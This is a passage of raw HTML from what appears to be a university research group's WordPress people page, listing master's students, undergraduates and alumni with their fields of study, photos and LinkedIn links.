h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c367-outer\">\n            <div data-colibri-id=\"182-c367\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c367 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c368\" class=\"d-block style-854 style-local-182-c368 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c368-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c368-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c369\" class=\"h-global-transition-all h-heading style-850 style-local-182-c369 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c369\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c370\" class=\"h-text h-text-component style-851 style-local-182-c370 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c371\" class=\"h-text h-text-component style-902 style-local-182-c371 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c373-outer\">\n            <div data-colibri-id=\"182-c373\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c373 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c374\" class=\"d-block style-854 style-local-182-c374 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c374-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c374-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c375\" class=\"h-global-transition-all h-heading style-850 style-local-182-c375 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c375\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c376\" class=\"h-text h-text-component style-851 style-local-182-c376 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c377\" class=\"h-text h-text-component style-902 style-local-182-c377 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c378\" class=\"style-855 style-local-182-c378 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c379-outer\">\n            <div data-colibri-id=\"182-c379\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c379 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c380\" class=\"d-block style-854 style-local-182-c380 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c380-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c380-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c381\" class=\"h-global-transition-all h-heading style-850 style-local-182-c381 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c381\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c382\" class=\"h-text h-text-component style-851 style-local-182-c382 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c383\" class=\"h-text h-text-component style-902 style-local-182-c383 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c384\" class=\"style-855 style-local-182-c384 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c168\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c168 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c175\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c175 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-844 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c169\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c169 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-831 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-832 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-833 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-835 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c254\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c254 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c280\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c280 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c281-outer\">\n            <div data-colibri-id=\"182-c281\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c281 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c282\" class=\"h-global-transition-all h-heading style-926 style-local-182-c282 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c282\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c255\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c255 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c256-outer\">\n            <div data-colibri-id=\"182-c256\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c256 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c257\" class=\"d-block style-913 style-local-182-c257 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c257-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c257-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c258\" class=\"h-global-transition-all h-heading style-914 style-local-182-c258 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c258\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c259\" class=\"h-text h-text-component style-915 style-local-182-c259 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c261\" class=\"style-917 style-local-182-c261 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c262-outer\">\n            <div data-colibri-id=\"182-c262\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c262 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c263\" class=\"d-block style-918 style-local-182-c263 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c263-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c263-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c264\" class=\"h-global-transition-all h-heading style-914 style-local-182-c264 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c264\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c265\" class=\"h-text h-text-component style-915 style-local-182-c265 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c267\" class=\"style-919 style-local-182-c267 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 